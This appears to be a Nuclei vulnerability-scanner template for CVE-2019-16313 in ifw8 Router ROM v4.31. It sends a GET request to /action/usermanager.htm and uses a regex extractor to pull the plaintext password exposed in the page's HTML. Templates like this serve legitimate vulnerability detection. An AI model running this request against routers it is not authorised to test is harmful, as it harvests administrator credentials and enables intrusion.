nuclei-templates/cves/2019/CVE-2019-16313.yaml

43 lines
1.2 KiB
YAML

id: CVE-2019-16313
info:
name: ifw8 Router ROM v4.31 Credential Discovery
author: pikpikcu
severity: high
description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.
reference:
- https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/CVE-2019-16313%20%E8%9C%82%E7%BD%91%E4%BA%92%E8%81%94%E4%BC%81%E4%B8%9A%E7%BA%A7%E8%B7%AF%E7%94%B1%E5%99%A8v4.31%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
- https://nvd.nist.gov/vuln/detail/CVE-2019-16313
- http://www.iwantacve.cn/index.php/archives/311/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-16313
cwe-id: CWE-798
tags: cve,cve2019,exposure,router,iot
requests:
- method: GET
path:
- '{{BaseURL}}/action/usermanager.htm'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<td class="pwd" data="([a-z]+)">\*\*\*\*\*\*<\/td>'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<td class="pwd" data="([a-z]+)">\*\*\*\*\*\*<\/td>'
# Enhanced by mp on 2022/03/30